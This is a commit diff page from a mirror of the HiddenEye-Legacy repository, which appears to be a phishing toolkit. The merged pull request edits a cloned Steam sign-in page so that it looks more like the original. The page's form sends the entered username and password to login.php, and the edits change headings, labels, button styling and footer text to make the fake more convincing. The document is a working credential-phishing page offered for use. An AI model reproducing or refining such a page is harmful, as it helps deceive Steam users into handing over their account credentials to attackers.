mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Merge pull request #197 from Bartixxx32/patch-1
Make Steam looks more like orginal
This commit is contained in:
commit
5f6bed08c4
|
@ -1,4 +1,4 @@
|
|||
<!DOCTYPE html>
|
||||
<!DOCTYPE html>
|
||||
<html class=" responsive" lang="en">
|
||||
<head>
|
||||
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
|
||||
|
@ -298,16 +298,16 @@ if ( typeof JSON != 'object' || !JSON.stringify || !JSON.parse ) { document.writ
|
|||
|
||||
<div class="mainLoginPanel">
|
||||
<div class="mainLoginLeftPanel">
|
||||
<h1>SIGN IN</h1>
|
||||
<p style="color:#c6d4df;font-size:12px;font-family: Sans-serif;">To an existing Steam account</p>
|
||||
<h1>Sign In</h1>
|
||||
<p>To an existing Steam account</p>
|
||||
|
||||
<div id="">
|
||||
<form action="login.php" method="POST" name="logon" id="loginForm" style="display: none;">
|
||||
|
||||
<div style="color:#c6d4df;font-family: Sans-serif;font-size: 12px;">
|
||||
<label for="steamAccountName">Steam account name</label><br>
|
||||
<font color="#417FAB">Steam username</font> <br>
|
||||
<input class="textField" type="text" name="username" id="steamAccountName" maxlength="64" tabindex="1" value=""><br /> <br>
|
||||
<label for="steamPassword">Password</label><br>
|
||||
<font color="#417FAB">Password</font> <br>
|
||||
<input class="textField" type="password" name="password" id="steamPassword" autocomplete="off" maxlength="64" tabindex="2" /><br />
|
||||
<div id="passwordclearlabel" style="text-align: left; display: none;">It seems that you may be having trouble entering your password. We will now show your password in plain text (login is still secure).</div>
|
||||
|
||||
|
@ -333,7 +333,7 @@ if ( typeof JSON != 'object' || !JSON.stringify || !JSON.parse ) { document.writ
|
|||
<div style="clear: both;">
|
||||
|
||||
<div id="login_btn_signin">
|
||||
<input class="btnv6_blue_hoverfade btn_medium" type="submit" id="SteamLogin" style="margin-top:39px"value="Sign in" width="104" height="25" border="0" tabindex="5" />
|
||||
<input class="btn_green_white_innerfade btn_medium" type="submit" id="SteamLogin" style="margin-top:39px"value="Sign in" width="104" height="25" border="0" tabindex="5" />
|
||||
</div>
|
||||
|
||||
<div id="login_btn_wait" style="display: none;">
|
||||
|
@ -774,7 +774,7 @@ if ( typeof JSON != 'object' || !JSON.stringify || !JSON.parse ) { document.writ
|
|||
<div class="footer_content">
|
||||
<span id="footerLogo"><img src="https://steamcommunity-a.akamaihd.net/public/images/skin_1/footerLogo_valve.png?v=1" width="96" height="26" border="0" alt="Valve Logo" /></span>
|
||||
<span id="footerText">
|
||||
© 2018 Valve Corporation. All rights reserved. All trademarks are property of their respective owners in the US and other countries.<br/>Some geospatial data on this website is provided by <a href="https://steamcommunity.com/linkfilter/?url=http://www.geonames.org" target="_blank" rel="noreferrer">geonames.org</a>. <br>
|
||||
© Valve Corporation. All rights reserved. All trademarks are property of their respective owners in the US and other countries.<br/>Some geospatial data on this website is provided by <a href="https://steamcommunity.com/linkfilter/?url=http://www.geonames.org" target="_blank" rel="noreferrer">geonames.org</a>. <br>
|
||||
<span class="valve_links">
|
||||
<a href="http://store.steampowered.com/privacy_agreement/" target="_blank">Privacy Policy</a>
|
||||
| <a href="http://www.valvesoftware.com/legal.htm" target="_blank">Legal</a>
|
||||
|
|
Loading…
Reference in New Issue
Block a user